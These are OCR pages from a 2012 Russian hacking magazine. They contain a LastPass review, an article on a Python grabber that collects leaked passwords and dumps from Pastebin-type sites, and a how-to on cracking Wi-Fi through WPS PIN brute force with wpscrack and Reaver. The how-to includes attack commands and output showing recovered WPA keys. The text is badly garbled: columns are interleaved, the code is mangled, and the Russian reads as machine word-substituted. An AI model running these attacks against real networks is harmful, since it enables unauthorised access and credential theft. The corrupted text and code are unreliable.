оприходовать специальную утилиту LastPass Sesame [есть версии около любые ОС), которая,

зация доступны всего только платным подписчикам .

бойко нашлась-ейстал великолепный

обслуживание

в соответствии с сути, превращает память во токе н. Если

надежное оставление движение ролей.

LastPass [lastpass.com), для котором аз многогрешный равным образом

Справедливости вследствие достаточно отметить, что-то

Но $12 на год- далеко не такая уже большая платеж после

остановился. Очень коротко опричинах, сколько у

моя особа выбрал его. Во-первых, услуга универсален

да работает почти все в равной степени кто ОС

[Windows, Linu x, Мае),

Sign in to Gmaillj\Jith your

который было пользу кого меня важным критерием. Он имеет плагины с целью всех попик улярны х браузе­

Goug[e Account

углубление [Fiгefox, lnteгne t Ехрlогег, Chгome, Safaгi, Орега). А платным подписчикам [$1 на месяц)

Dl Dl

доступны в свой черед версии к иерей улярных

мобильных ОС . Во-вторых,

LastPass

Username: llpuser ::::==========~ ! Password:l••••••••

делает

казаться то, сколько с него требуется- автомати­ чески предлагает соблюсти батман роли равным образом способности

форм, а по времени подставляет их присутствие следующем

D

посещении страницы. Е сли аккаунтов для какого-то сайта несколько, ведь дозволяется аллегро

Stay signed in 1 Sign in

направиться от одного держи другой. А разве

J

в целях какого-то кривого сайта документация автома­ тически безвыгодный парсятся, в таком случае сие свободно реставрировать

вручную. В-третьих,

LastPass

Can't access \'СUГ acccunt?

храни т зашифро­

ванные движение роли на облаке, бард ому хранилище с танцевальный шаг ролями невыгодный необходимо быть беременным не без; лицом получи и распишись флешке

016

LastPass

работает сверху любых устройствах равным образом ОС

Автоматический вводлаги получи и распишись равно чета ля изо базы

ХАКЕР

LastPass

03/158/ 001 0


Proof-of-Concept СОБРАТЬ ИНТЕРЕСНЫЕ ДАННЫЕ С PASTEBIN.COM И ПОДОБНЫХ СЕРВИСОВ

ХОСТИНГ ТЕКСТА

Такая репутация ресурса несложно объ­

Максимально памяти равно складно расшарить лю­

яснима: и оный и другой может поместить бери нем

битва текстовый обложка - такова цель извест­

любые сведения не выделяя частностей кроме регистрации. При

ного онлайн-сервиса PasteЬin . com. Создатели

этом склерозник отнюдь не пр оходят дерьмовый премодера­

изначально рассчитывали, ч так их проектом

ции равно туточки а оказываются на Сети. Моментально.

будут деятельно вкушать nрограммисты,

Руководство, конечно, удаляет прот ивозакон ­

которые несложно смогут облицовывать сверху этом

ный контент объединение первом у запросу правообла­

ресурсе любые исходники от подеветкой синтак­

дателя иначе говоря пострадавшей стороны, а для этому

писан держи

Python,

ведь запускается всё с команд­

утнапиштим строки:

python gather.py -k kwords -о urls.db \ -а harvest Ключ 'haгvest' заключает производительность сбора

данных. Отчеты что касается найденных данных будут

сиса. И приближенно поначалу да было. Н по отношению что-что они правильно

времени дьявол поуже успевает разжиреть по части Сети.

оставлять в определенный

безграмотный могли ожидать, приблизительно сие бешеной популярно­

Это , во общем, летопись малограмотный всего-навсего для PasteЬiп .

<< -О >>ис пользуется к выбора файла интересах

сти сервиса у хакеров . Вспомни по сию пору последние

сот, так равным образом насчет др угие на одно лицо сервисы:

вывода . А треншальтер

истории от взломами ото Анонимов равно

ключевых слов, получи которые склифосовский откликаться

-почти во всякое время ради публикации конфиденци­

Pastie, FгubaгPaste, YouгPaste, Codepad, Slexy и Lodge lt. Идея сегодняшнего РоС- автомати­

альных данных [к примеру, дампов паролейl ис­

ческий выручка «интересных» данных из подобных

пожалуй, самое главн ое . Например, упо­

пользовался то есть PasteЬiп.c om . За примерам

ресурсов. Иными словами, нужно претворить в жизнь

мянутые за пределами сценарии были максимально

километров двигаться безграмотный нужно. Среди самый по­

инструмент, обходящий дневной журнал да согласно некоторым

адаптированы пользу кого поиска дампов вместе с учеткам

Lulzsec

<<-k>>

e-mail.

Опция

позволяет где раки зимуют базу

граббер . Вообще, настроить кейворды- это,

пулярных нате житейский момен т записей [ pasteЬin .

ключевым словам собирающий большую базу

пользователей, логов чата, информации относительно кре­

com/tгends l незамысловато заметить, для примеру:

данных «интересного>> контента.

дитных картах да банковских аккаунтов. Список

• дамп каких-то учета для вместе с Fa cebook; • внутреннюю базу данных какого-то

ключевых слов, используемых в соответствии с умолчанию

взломан­

ного сайта, начиная e-mail'ы пользователей

во

PastyCake, по прямой

скажем, невелик:

Идея, нате самом деле , далеко не новая. В Сети можно найти масса написанных сверху коленке сценари­

равным образом хеш да их танцевальный шаг ролей;

СБОР ДАННЫХ

распечатка IР-адр есов вместе с привязкой ко конкретным

организациям равным образом компаниям.

ев: возьмем , через malcOde [ Ьit . ly/Aп58Yd l или NeonTempest [ Ьit.ly/zRuК7o l. Но лучшей реа­

DEFAULT_KEYWORDS=[ 'password' , 'hack' ,

лизацией затеи, пожалуй, является схема

PastyCake ото исследователя 0Ь+ [ Ьit. l y/xHXd f H I, de f

readke-fWOrd8 {fЬ&n.:llet:

какой спирт опубликовал вовсе недавно.

"'f7. tu~ [_.r s ;r1p(l for _ l n t hendl e ]

dtiГ

fltch (ltOIIif!, 00\lrCf!l, lritY"//rdl,

se trch_rc"'

l~t'e-UtCh):

N.c:~~~;~ilc( 'I' .]Oln(Ryvo:dsl)

for QC:Iera:.cr,

pt t.Ь

':ittt

s :&tus ,

in

ради верить, в качестве кого суперидея реализована получай практике.

получай хостингах PasteЬiп .com да Pastie.oгg да логи­

Дальше всё зависит через твоей фантазии.

ровать безвыездно записи, используя базу ключевых

s rc:.new_urls{ s to r a~11:):

• ;t ntrttor.~t..,;tttt(path)

слов. Результаты сохраняются во текстовом

! ull_url •IJ1!:!1eracor.!ull ..u:l{Jiath)

файле другими словами базе данных

print •ts

NtC.Ьtd

SQLite.

В ближайшем

времени особо появится опора

s coraoc . s avc_url(!ull_url, :uec:h.Qroup(l

Н

utch and stoa ..IOoltC:h a l sa

' ' ' t (!ll.ll_u:l,

"'~ 0

MongoDB

равным образом

MySQL.

П оскольку план зарабатывать

дет Тwittег-ленту PasteЬinleaks l twitteг.com/# ! / PasteЬin l eaks l, идеже его робот-парсер автомати­

еsеr -ш (нчs • 'С!!' ): _Ь..ttend_or_uit lstoraoel: Jtor&\lc.connec~(l

not

нoa.oe.connccttdO:

print

>> :~ys.stde п,

сы, которые периодично обходя т контент

таких хостингов да публикуют интересные К примеру, исследчик Джейм Бл аско ве­

utl-tull_url, dtta'"CI.ata)

Н

РАЗВИТИЕ ИДЕИ Интересно, что такое? на Сети даже если очищать целые ресур­

ссылки со соответствующей классификацией.

ь.ц:h.qroup(IJ

L.ltn!:l( 'utch' ,qentator,t~;e:age,:at c h-:uteh.q:cup(),

.ser

Но даже если сего в корне достаточно, с тем

Скрипт позволяет изощренно избегать ежедневник

чески п убликует еженедельник видать

"!a1led to open stOrl9f! b•ct'IHid•

lyl.t!l.l~( l l

l"etu rn

s ~ orage

PossiЫe

t l"/1 ер~ • • ..sa rse_op~•!•~ • l e;o;cept IC8J"ror • • е : p1"1nt>>sys.Jtdeн,

sya.e;o;i,t( l ) n~....ord•

PossiЫe listing of http passwords http://pastebin.com/qZbccMB7 PossiЫe Juniper configuration with password http://pastebin.com/9vuwzjnS

-

Н op~s.tvB le:

ke \'Wr:>I'ds • _aad_lteyworda(opt s .ltv!ile l i:I JI 811ft:

keywords •

Massive mail/pass leak

http://pastebin.com/LбYbDlЗб

·opt10Qt!tn~r:

D!fAt!L!_кtYio't!RDS

0ourc•• • ! fasteЫnSource(l,

с. ..·~-~­

fasti e S~;~urce (l

~-----

Oestroy Spyware

Справедливости за нужно говорить , что Исходник грабберана

ХАКЕР

03/158/2012

Python

Раздел

«Trending Pastes)) -

что такое? качают чаще всего?

на последнее сезон апдейты прекратились. ::х:

017


COVERSTORY •

rlal Nc.

01С10С11100003

Туре

01111181~IOIIIQII IIНIMНIIIIIIIIIIIII IW IIII мд, дddre

C oпntct

Р IN-код уж потен ц иально п одвержен ата­

to il Nttwork

ке в виде bгutefoгce. Н что до сие едва цве т очки.

the network security key

УЯЗВИМОСТЬ

~( Шit'jkty:

'

COC1C0500D55 ,• • • • • 01111 0111111 ( ;;, 0484-0~

Как ваш покорный слуга еще заметил ранее, РIN-код состоит

Е] Hidt от lш<~сtш

Y o~r

c;1n :~l so conr1tct bLrttor1 011 tlн• ro~•tt r .

с восьми цифр - следовательно, существует Ьу p щl1rr1g

00л81100

tl1t

однако сократить. Д ело на том, в чем дело? впоследствии д няя число

="--"-.:==~ РI N - ко од

Лоrо ти пWРS

Ри от ун относительно ко

WPS

0. РIN-код WPS, намалеванный

ок

получи и распишись корпусе раутера

000 000 0вариантов пользу кого подбора. Од ­

нако сумма вариантов позволяется существен ­

Рисунок

0.

Окн в отношении дл ваш покорнейший слуга во вод а Р IN-кода

~

РI N-кода представляет собою некую наблюдение ­ ную сумму, которая высчитывается для осно­

вании семи первых цифр. В итоге получаем

WPS

сейчас

0ол711 касательно 000 0001 вариантов. Н насчёт равно ЭТО до сей времени

неграмотный все! Далее на н имательно смотрим для устрой­

ЦЕНА УПРОЩЕНИЙ Открытых точек доступа, ко которым не вдаваясь в подробности

lхардварнуюl да возьми компьютере lсофтварнуюl,

ство протокола аутентификации WPS !рисунок 31. Такое ощущение, ась? е г в отношении специал ь однако про­

неграмотный полагается подключать отпирка пользу кого подключения,

тем самым активируя дело настройки.

ектировали, ч т обы покончить вероятность на

становится по сию пору больше да меньше. Кажется, аюшки?

Нам сие неинтересно.

брутфорса. Оказывается, контроль РIN-кода

Ввод РIN-кода на веб-интерфейсе. Пользо­

осущес т вляется на двушник этапа. Он делится получай двум

нажимаетспециальную кнопку в раутере

бегло их дозволяется довольно завеять во Красную книгу.

0.

Если первоначально душа был в состоянии хоть равным образом безграмотный знать, почто

ватель заходит посредством бgаузер во админи­

равные части, равно каждая порцион проверяется от­

беспроводную козни дозволительно застлать ключом,

стративны й интерфейс раутера равно вводит

дельно! Посмотрим получи схему :

обезопасив себя ото посторонних подключе­

после РIN-код изо восьми цифр, отписанный

0.

ний, в таком случае в эту пору ему однако чаще подсказывают

получай корпусе у стройства !рисунок

касательно экий возможности. Взять добро бы бы кастомные

чегопроисходитпроцесс настройки. Этот

прошивки, которые выпускают ведущие про­

образ годится вернее интересах перваначаль­

вайдеры интересах популярных моделей роутеров,

утнапиштим конфигурации роутера, отчего автор сих строк его

с целью облегчить настройку. Нужно адресовать двум

рассматриватьтоже никак не будем .

вещи- логин/па значение равным образом ... треншальтер к защиты

01, в дальнейшем

Е сли затем насчёт т сылки сведения М4 атакую­ щий получил на отклик

EAP-NACK, ведь симпатия

может

состоять уверен, почто первая ч асть РIN-кода неправильная.

0.

Е сли а возлюбленный сообразно л учи л

EAP- NACK п осле от­

сылки М6, то, соотве т ственно, вторая деление

Ввод РIN-кода бери компьютере пользовате­

РIN-ко д а безвыгодный на ерна. П олучаем 0 0л411 О

беспроводный сети. Что вновь паче важно,

ля !рисунок 01 . При соединении со раутером

вариантов чтобы первой полови н ы равным образом 00лз 01

самочки производи т ели оборудования стараются

допускается обнаружить специальную сессию

произвести работа настройки незамыслова т ым.

во рамках которой настроить роутер либо

0001 с целью второй. В итоге имеем токмо л ишь 11 000 разное н так во для того секс н в рассуждении г насчёт п еребора .

Большинство современных раутеров поддер­

получитьуже имеющиеся настройки, ежели

Чтобы отличается как небо ото земли понять, наравне сие буд е т работать,

живают живое золото н течение

как следует внедрить

WPS IWi-Fi Pгotected Setupl.

З.

Pl N - код.

WPS,

Вот сие еще п ри­

0001

посмо т ри нате схему .

С его через пользовател ь следовать считанные

влекательно.

секунды может настроить безопасную беспро­

Для открытия подобной сессии неграмотный нуж -

перебора. Она что касается г ра н да ч ена скорост ь ю обра ­

водную сеть, по отношению ко всему невыгодный забивая себя голову

сверху никакая аутентификация. Это может

ботки рау т ером W РS - ради п росов: что касается д ни в таком случае ч ки

тем, почто «где-то уже нужно привнести шифро ­

учинить кто хочешь желающий! Получается, что такое?

досту п а будут во ыд а на а т ь резул ьт ат каждую

0.

Важный моме нт - возмож н ая ско р отросток

вание равно показать WРА - ключ». Ввел во системе восьмизначный символьный

PIN,

кой

написан возьми роу т ере, - равно готово' И гляди после этого

IEEE 002.11

держись крепче. В декабре разом двойка иссле­

0upplicant--+ АР

Aut hent ication Requ es t

Э т по части равно как

0upplicant - А Р

Authentication Response

агатовый движение в целях любого роутера. Оказалось,

0upplicant--+ АР

Association Request

0upplica nt - А Р

Association

дова т еля рассказали касательно серьезных фундамен­

тальных прорехах во протоко л е

WPS.

аюшки? разве во точке доступа активирован

WPS !ко­

торый, н а минуточку, вклю ч ен во большинстве

раутеров в области умолчанию!, в таком случае выбрать PIN для подклю~ения да извлечь родничек про подключе­

WPS?

Задумка создателей

WPS

хороша. Механизм

автоматично ради д ае т название узы равно шифрование.

Таким образом, п ользова т елю неграмотный т н еобходи­

002.11 Association

IEEE 002.11/ЕАР

ния мож.но из-за считанные часы! КАК РАБОТАЕТ

Respo пse

002.11 Authentication

0upplicant --+ АР

EAPO L·5tar t

0upplica nt - А Р

EAP-Req uest ldentity

0upplicant ..... АР

EAP·Response ldenti ty (ldenti ty: "WFA-5impleConfig-Regi stra r-1 · 0')

ЕА Р

lnit iation

IEEE 002. 0 0/ЕАР Expanded Туре, Vendo r ID: WFA (Ох372А), Vendor Туре: SimpleConfig (Ох01)

мости восходить на веб - интерфейс равно понимать толк

М1

En rollee ..... Re gist ra r

N1 01 Description 01 РКЕ

со сложными нас т ройками . А ко сейчас настро­

М2

Enrollee- Regi strar

N1 01 N2l l Description 01 РК мы 01 Authenti cator

мз

En rollee ..... Regis t rar

N2ll E·Hash1 01 E·H ash2l l Authe nt icator

М4

Enrollee - Registra r

MS

En rollee ..... Reg istrar

N 0 01 R-Hash 0 01 R-Ha sh2 01Eкevw,.oк.v(R-5 0) 01 Authenticator N2ll Екеуw,.рке/Е-51 ) II Authenticator

Мб

Enrollee - Registrar

N1 01 Екеуw,.рк.у( R-52) II Authentica t or

proove posession of 0' half of PI N

М7

En rollee ..... Reg ist ra r

N2ll Екеуw,.рк.у( Е-52 IIConfig Data) 01 Authent icator

proove posession of 0' half of PIN,

мв

Enrollee - Reg istrar

N1 01 Eкeywrapкey(Con figData) 01 Authenticator

send АР configuratio n set AP configuration

енной узы мож н в отношении кроме п роблем добави т ь

что ни попадя уклад !например, ноу т букl: если правильно завести

PIN,

в таком случае спирт полу ч ит совершенно необ­

ходимые настройки. Это адски удобно, того

по сию пору крупные игроки в рынке ICisco/ L iпksys, Netgeaг, 0- L iпk, B elkiп, Bu ffalo, ZyX ELI сейчас пре д лагают беспрово д ные раутеры вместе с за дд ерж­ кой

WPS.

Разберемся символически по мнению д робнее.

Существует три варианта испо л ьзования

WPS: 1. Push-Buttoп - Coппect IPBC I. П ользователь

020

Рису н в рассуждении ко З . Прото для ол аутентифи ко аци равно

Diffie·Heltman

Кеу

Exchange

proove posession of 05 ha lf of PIN proove posession of 0st hatf of PI N

WPS

ХАКЕР

03/158/2012


В зломать

HOWTO:

Осно вн ое период п ри этом затра ч ивается

<.. . > trying 08674095

нарасчетотк р ы т относительно г оклю ч апоалгоритму

PIN

Д иффи - Хеллмана, возлюбленный д олже н бы т ь сгенери­

<.. . > Networ k Кеу: reall y_re ally_lon g_wpa_p assphr ase_good_ luck_crack i ng_t his_one <.. . >

секун д у, д ругие- каж д ые десят ь секун д .

рова н п е р е д предприятие ом МЗ. З атра че н ное в зто время мож н в отношении у м е н ь сметывать , ваша сестра б р ав н а сторо н е клиента беспритязательный сек р ет н ый ко л юч, который в д альнейurем упрос т равным образом т р асчеты других

Wi- Fi

ради

ч асо во

# f ound 0st half of

ключей . П рактика показы во ает, чтод л я ус п е шн насчёт г по части р езульт а т а обы чн в отношении д ос т а т оч н об

Как видишь, сперва была nодоб р ана

п еребрать лиш ь п оло на ину всех вариантов,

первая nоловина РIN-кода, впоследствии - во т орая,

равным образом на среднем брутфорс занимает сумме отче ­

равно на конце концов проект выдала заготовленный

т ыр ех д что касается д еся т равным образом часов.

ко использованию источник с целью подключения

ко беспроводный сети. Сложно п ре д не без; т а во равным образом т ь,

ПЕРВАЯ РЕАЛИЗАЦИЯ

сколько стоит времени потребовалось бы, с тем

Первой появившейся реализацией брутфорса

вобрать в себя источник такого типа длины [61 символ)

стала обслуживающая программа wpsc г ack

впереди существовавшими инструментами.

[goo.gl/9wABj l, нате ­

писа нна ваш покорнейший слуга иссле д насчёт на ателем Стефа н ом Фибё ­

В п р очем, wpscгack далеко не единственная обслуживающая программа

комок в моя персона зыке

с целью эксплуа т ации уязвимости, равно сие баста

Pytho n. Ут илита

исnользовала

библиотеку 0сару, п холм на оляю щ ую конструиро­

комичный момент: во так но само~ период по-над

вать п р оиз во ольн ы е сетевые пакеты. Сценарий

праздник а самой проблемой работал равно иной

мож н об после п усище т ит ь т олько п в рассуждении д L in u х-системой,

исс л едователь- Крейг Хеффнер иэ компании

п ре д во а ри т ельно nе р еве д мы враг п роводной

Tactical

интерфейс во система мониторинга. В качес т ве

появился авралящий РоС к реализа-

параметров необхо д имо указа т ь прозвание сетевого

ции атаки, дьявол опубликовал свою у т илиту

интерфейса во сис т еме , МАС - а др нашел враг п ро­

Reaveг lc o de . g o ogle .co m / p /гea v eг- w ps l. Она

вот дн что касается г в рассуждении адаn тер а , а т акже МАС - а др нашел так ч ки

н е только лишь автоматизирует дело п в отношении д бора

доступа равным образом ее имя

WP5 - PIN

[551 01.

N etwoгk

0olutions.

Инкремент~уем

0 дробь PIN

·~·

nepecчиtloiВ88U

контра~ьную сумму

Увидев, сколько на Сети

равно извлекает Р5К - ключ, однако равным образом пред­

ла г ает большее величина настроек, ради

$ ./wpscrack .py --iface mon0 \

атаку дозволительно было исполнить для т ив самых

--client 04:0с:бd:88 : 00 : 0 0 \ - -bssid f4:ec:38: cf :00:00 --ssi d t est ap - v sniffer st arted trying 00000000 attempt took 0.95 seconds try ing 00010009 < ... > try ing 08660005 attempt too k 0.08 se conds try ing 08670004 # found 0st half of

раз в год по обещанию н ых рау т е ров. К тому а в рассуждении н а п по части дд ержи во ает

Рисунок

0. Блок - не без; х ема

брутфорса РIN-кода

WPS

на одных побег т ройств. Поз т ому ис п ользовать мы будем особенно его. Шаг О. Готовим систему

нам н ого большее доля беспроводных

На официальном овраг т е B ackTгack

адаптеров. Мы решили взять хоть ее вслед за основу

ступен ради загрузки на виде виртуал ь утнапиштим

да до мелочей описать, в духе злодей

аппаратура около VMwa г e равно загрузочного образа

может эксплуатировать уязвимост ь на ради т околе

050.

WP5 про

прямо-таки записат ь об р аза нате болва н ку, а мож н по отношению

подключения для вслед за щ равно щ ен н ой бес­

д о­

Рекомен д ую п ос л е д ни й на ари а нт . Мож н что касается

от через программы

проводной сети.

0 R1

UNetbooti n [ uпetboot i n.

souгcefoгge . net l со д е л ать загрузо чн ую фле ш ку:

i:I•NIIel

приблизительно иначе говоря ина ч е, следовать г рузив ш ис ь не без; т ако г в отношении носи ­

К а ко да чтобы все непропорционально кто разный атаки нате демон п ровод ­

теля, ты да я лишенный чего л да ш них заморачек одновременно буд ем

ную сеть, нам понадобится

обладать систему, готовую ко работе.

Linux.

Ту т следует

PIN

сказать, зачем Reaveг присутствует во репазито­

attempt too k 0.09 se cond s t ry ing 08670011 att empt t ook 0.08 second s

ри равно всеми известного дистрибутива B ackTгack

Шаг

[ backtгack- li nux.oгg l , во котором ко тому а сейчас

Л огин да п араль дл моя особа вхо д а сообразно умо лча нию ­

во клю ч ены необходимые драйвера чтобы беспро -

0. Вход

во систему

гооt:tоо г. О каз а вшись на консо л и, позволяется сме л по части

старто на а ть иксы [ест ь отдель н ые из борки B ackTгack - на правах от

GNOME, т ак да из К ОЕ) :

# st art x

ЭКСПРЕСС-КУРС ПО ВЗЛОМУ WI-FI

Шаг

0. Установка

Reaveг

Чт обы загр узи ть R eav eг, нам п по отношению надо об ит не без; автор

0. WEP (Wiгed Equivalent Pгivacyl

заимствовать кнопка с целью ради для рытой WPA/WPA2 тенета [да

да н тер н ет. П оэ т ому п в отношении д ко л ю ч аем пат чко рд

Самая первая методика в целях защиты бес­

да ведь чрезвычайно близ наличии дампа в такой мере

alias настраи на аем злой гений относительно вот д утнапиштим а д а пт ер

проводной путы оказалась шибко слабой.

называемого

[Applications ~ l nte гn et 0 Wicd N e t wo г k

Взломать ее можн в отношении просто-напросто следовать сколько-нибудь

ется во воздушное пространство возле подключении клиента для точке

минут, используя слабости применяемого на ней

доступа) . Брутфорс может затянуться возьми дни,

ми н ала, гд е загружаем п ос л е днюю на е р си ю

шифра

месяцы равно годы . Для увеличения эффективно­

у т не так — не то т ы ч ерез р е п озиторий :

RC4. Основными

инструментами в этом месте

WPA

Haпdshake, для оторый переда ­

служат снифер aiгodump-пg ради сбора шаг кетов

сти перебора поначалу использовались специа­

да обслуживающая программа aiгcгack-ng, используемая непосред­

лизированные словари, позднее были сгенери­

ственно чтобы взлома ключа. Также существует

рованы радужные таблицы, через некоторое время появились

специальная тулза wesside-пg, которая по отношению ко всему

утилиты, задействовавшие те х нологии

взламывает всегда близлежащие точки не без;

CUDA

WEP

да

ATI

# apt - get update # apt-get install rea ve r

NVIDIA

0tгeam чтобы аппаратного ускорения

Тут получай д насчёт сказат ь , ч т насчёт во ре п ази т а р ии н а­ хо д да тся на е р эта

0. WPA/WPA2 (Wiгeless Pгotected Access)

GPU. Используемые инстру ­ менты- аiгсгасk-пg (брутфорс до словарю), cowpatty [с по мнению м ощью раду ж ны х т а блиц) , pyгit

Перебор-это однозначный путь подо-

[с исполь з ова н ие м на равно део ко артыl .

рекомен д условная единица т обновит ь ся до самого максимал ь хотя

во автоматическом режиме .

ХАКЕР

03 /158/ 0012

процессаза контокоррент

Man age г l . Дал ее з ап ускаем эмулят по отношению р тер ­

0.3,

ко т орая ли чн что до у ме ня

зар а потому что т а ла н е пр ави льн о. П оиска во ан ф об р м а ­ цию насчёт проблеме, ваш покорный слуга нате ш ел место а вт ора, некоторый

021


COVERSTORY возможной версии, скомnилировав исход­

ники, взятые изо

SVN.

Эта директива создает воображаемый интер­

Это, на общем, самый

фейс на режиме мониторинга, его обозначение

у нивер са льный от n особ уст ановки ( для того любого

короче замечено во выводе команды (обычно это monOI . Теnерь нам надлежит разыскать точку достуnа

дистриб утива !.

пользу кого а та ки равным образом проведать её

BSSID . Восnользуемся

у ти крепко сбитый пользу кого nрослушки дьявол n ро на по части дн ого эфира

$ svn checkout http ://reaver-wps. googlecode .com/sv n/ trunk / reaver-wps $ cd ./reave r-wps / src / $ . /configure $ make # make install

aiгodump-ng:

# airodump-ng mon0 На экране nоявится сnисок точек достуnа

Рисунок

0. Reaver Pro- тачка с создателей Reaver

во радиусе досягаемости. Нас интересуют точки Никаких проблем со сборкой nод BackTгack не короче - nроверено сам . В дистрибутиве Агсh

Linu x,

ко торы м nользуюсь я, настройка

из шифрованием

# reaver -i mon0

до ключу

WPA/WPA2 равно аутентификацией PSK. Лучше сортировать одну с nер­

-vv

00:21:29:74:67:50

вых во сnиске, круглым счетом вроде ради nроведения атаки

Ключ

охватывает разбуравленный следствие

nроизводится равно того nр что до ще , вследствие нали­

желательна хорошая соединение со точкой. Если точек

чию соотве т из тв ую щего

беда сколько равно сnисок малограмотный умещается бери экране, так мож­

nрограммы, дай тебе автор сих строк могли убедиться, что такое? совершенно

так восnользоваться видоизмененный извест н ой утилитой

работает наравне должно .

PKGBUILD'a:

немного погодя интерфейс побольше nрисnособлен

- kismet,

$ yaourt -5 reaver-wps-svn

во этом nлане. Оnционально _можно в месте nро­ Шаг

0.

Подготовка для брутфорсу

верить, включен ли получай нашей точке приспособление

WPS. Для сего во комnлекте не без; Reaveг (но только если выманивать его изо SVNI отлично обслуживающая программа wash :

Для исnользования Reaveг надлежит nро­ делать следующие вещи:

nеревести бесnрово низ й а даnте р на политическое устройство

# ./wash -i mon0

мониторинга;

определить фамилия бесnроводно г в рассуждении интерфейса;

• • •

вызнать МАС-а дрес т иллюминаторы д остуnа (BSS IDI; убедиться, что-то возьми т очке активирован

В качестве nараметра задается имя интерфейса, nереведенного на производительность мони­

WPS.

торинга. Также дозволено исnользовать оnцию

интерфейс по отношению ко всему nрисутств зеленый т на системе:

наnример, тем а aiгodump-ng. По неnонятной

# iwconfig

ляет PIN'ы точке д остуnа, значит, всё-таки завелось

ли утилиту

хорошо, равно остается туnо ж наделить . Пр оцесс может

wash.

Будем надеяться, для моменту

nубликации статьи эту ошибку исnравят.

затянуться. Самое короткое время, следовать которое

Шаг

nримерно nять часов. Как токмо некто буд ет nо­

ми посчастливилось сбрутфорсить

wlanOI- значит,

0. Запускаем

брутфорс

режим расnознала адаnтер !если некто nодклю­

Теnерь позволено nристуnать неnосредственно

чалея ко бесnрово дн ой сети, с намерением запутать

ко nеребору

nростом случае нужно немного. Необходимо

П ере во е д ем адаnтер на распорядок мониторинга:

просто-напросто обозначить прозвание интерфейса (nереведенного

# airmon-ng start wlan0

точки достуnа:

нами досель на система мониторинга! равно BSSIO

00:21·29:74:67:50

-с б

Reaver v1.~ W1F1 Protected Setup Attac~ Tool Copyrtght (CI 0011, Tact1cal Network Solutions. Cra1g Heffner

0-1

~att1ng

[-]

S~I!Chtng ~onO

l1nksys -d 05 -vv

Рисунок

00:21:29.74:67:50

0

022

0. Пример работы

WPA-PSK,

тот или другой мгновенно но дозволяется ис­

МОЖНО ЛИ ЗАЩИТИТЬСЯ? сnособом- отключить нафиг

Wa1t1ng for beacon from 00:21:29:74:67:50 Sw1tch1ng monO to channel б Assoctзted w1th 00:21:29·7J·67:SB (ESSID: l1nksysl Trv1na p1n 04637129 Кеу cracked 0n 0 seconds WPS PIN: '64637129' ~РА PSK· MyHOrseTh1nkSYouStolЗH1sCarrot • -1 АР SSID: l1nksys

0

родничек

Защититься с атаки позволяется nо ка по части дн им

б

l1nksys --p1n 04637129 -vv

Reaver v1.~ W1F1 Protected Setup Attack Tool Copyr1ght lcl 0011, Tact1cal Net~ork Solutions, Cra1g Heffner ccheffnerJtacnetsol.com>

•1 ·1 •1 •1 ·1 •l -1

[+] Trying pin 04637129 [+] Кеу cracked in 03654 seconds [ +] WPS PIN: '64637129' [+] WPA PSK: 'MyH0r seThink$You5tol3HisCa rrot!' [+] АР SSID: 'linksys'

аюшки? аж никак не укладывается во голове.

·с

добран, nрограмма светло об этом сообщит:

nользовать пользу кого nодключения. В се та ко nросто,

[-] т~-y1r1g р111 01889978 [' 0 WARNING· Rece1ve t1meout occurred ~onO

составило

Самое ценное здесь- э т о, знамо же, ccheffner~tacnetsol.com>

•or beacon from 00:21·29·7J:67:50 to channel б 1·1 Assoc1зted w1th 00.21:29.74.67:50 0ESSID: 01nksys) !·1 Trv1ng p1n 03979978

reaver -1

PIN,

PIN'a. Для старта Reaveг на самом

Reaveг, так отличается как небо с земли об терзать nод ключение!.

~onO

Если nрограмма n ос ледок в отношении вательн в рассуждении отnрав­

nричине на nакет Reaveг во BackTгack малограмотный включи ­

Е сли на выводе э праздник команды вкушать интер­

reaver -1

Reaver v1 .4 WiFi Protected Setup Attac k Tool Copyright (с) 0011, Tactical Network Solutions, Craig Heffner <c heffner@ tacnetsol .com> [+] Waiting for beacon from 00:21:29:74:67:50 [+] Associated with 00:21:29:74:67:50 ( ESSID : linksys) [+] Trying pi n 03979978

'-f' да скормить утилите сар-файл, созданный,

Для альфа и омега nроверим, почто бесnроводной

фейс со оnисанием (обычно сие

"-vv"

WPS

во настрой­

ках роутера. Правда , в духе оказалось, не без; д е лат ь э т в отношении к тому идет дале ко безграмотный во всякое время . П оско л ьку уязвимость су щ ествуе т неграмотный нате уровне реализа­ ции , а для уров невыгодный nротокола, постоять кого с nроиз­

водителей быстро г по отношению nатча, ко торый решил бы все nроблемы, отнюдь не стоит. Самое большее, что они могут в ту же минуту от д елать, - сие принцип льн о nротиводействовать брутфорсу. Наnример, если блокиро ват ь

WPS

нате одинокий пора nосле nяти

неудачных nоnыток ввода РIN- ко истинно , так nеребор займет еще недалеко

00 дней.

Но непохожий на оnрос,

в какой мере амором дозволено налететь подобный патч

получи и распишись капитал устройст на , ко т орые работают брутфорса

Reaver

объединение всему миру? :х:

ХАКЕР

03/158/201 0


HOWTO:

Взломать

Wi-Fi

после

00

часов

FAQ r;t

a.l

n

Какой беспроводный трансформатор нужен

был поврежден по мнению пути. д чисто с целью атаки

литы

про взлома?

в

находится во списке .

WP5

ничего не поделаешь строгое соблюдение

wash:

запусти её да проверь, что такое? твоя задача

Перед тем в качестве кого экспериментировать,

протоколу передачи танцевальный шаг кетов в обществе точкой

Почему мы неграмотный могу соединяться

нужно убедиться, что такое? беспроволочный

доступа да Reaveг пользу кого проверки каждого

не без; точкой доступа?

преобразователь может сидеть во режиме монито­

РIN-кода . Если быть этом какой-то сверток

Это может взяться через плохого уровня

ринга . Лучший способ- свериться со спи­

потеряется, либо придет во непотребном

ском поддерживаемого оборудования

виде , так придется вновь помещать

08.1

сигнала тож потому, что-то твой адаптер непригоден с целью подобных изысканий.

возьми сайте проекта Аiгсгасk-пg ( Ьit.ly/wifi

WР5-сессию. Это делает атаки в

adapteг list l. Если но встанет задание касательно том,

неизмеримо побольше зависимыми с уровня

какой-никакой беспроволочный устройство купить, в таком случае

сигнала. Важно помнить, сколько буде твой

зачать не грех вместе с любого адаптера получи чипсете

беспроволочный звукосниматель видит точку доступа ,

RTL8187L . U5В'шные донглы мелочёвка найти винтернетеза $20.

WP5

r;1

"гаtе limiting detected"?

в таком случае сие ещё далеко не значит, ась? равно степень доступа

081

доступа заблокировала WP5 . Обычно

видит тебя . Так что-то когда твоя милость являешься

сие временная блокировка (около пяти минут!, да на некоторых случаях могут влепить равным образом постоянный ба н (разблокировка

n

счастливым обладателем высокомощного

0':'1 ~

n

Почему у меня возникают ошибки

адаптера через

"timeout"

получи и распишись пару десятков

равным образом "out of огdег"?

Обычно сие происходит по причине низкого

